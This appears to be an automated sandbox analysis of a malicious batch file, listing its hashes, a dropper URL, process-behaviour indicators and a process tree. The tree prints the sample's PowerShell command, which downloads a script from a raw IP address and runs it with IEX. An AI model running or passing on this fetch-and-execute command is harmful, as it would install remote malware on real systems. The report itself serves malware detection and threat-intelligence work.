8178b2a273ccd3ec4e01c78beeabb8b306e6851906b9581eff43d3af65cb72cb

Analysis

Target

6ebe9b72866bb759c8fb8b43c6691c55.bat
Size

217B
MD5

9a910f1611f357e048f8f5ca83a09740
SHA1

ca3e718abf686be0e827824a117c276ebab717d9
SHA256

8178b2a273ccd3ec4e01c78beeabb8b306e6851906b9581eff43d3af65cb72cb
SHA512

279acdb19eefff654a3828abdb8e37ac8d0a937ba8908e8465f2daefb88cfade810fc0ff18c2dd43288583a5b48a634cd4813fb087a837e2331190bd3470cb01

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/6ebe9b72866bb759c8fb8b43c6691c55

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1516 wrote to memory of 1292	1516	cmd.exe	25
PID 1516 wrote to memory of 1292	1516	cmd.exe	25
PID 1516 wrote to memory of 1292	1516	cmd.exe	25
PID 1516 wrote to memory of 1292	1516	cmd.exe	25

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1292	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1292	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1292	powershell.exe
1292	powershell.exe

Blacklisted process makes network request 1 IoCs

flow	pid	Process
4	1292	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\6ebe9b72866bb759c8fb8b43c6691c55.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1516
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6ebe9b72866bb759c8fb8b43c6691c55');Invoke-RDYJJFERDU;Start-Sleep -s 10000"
  2⤵
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Blacklisted process makes network request
  PID:1292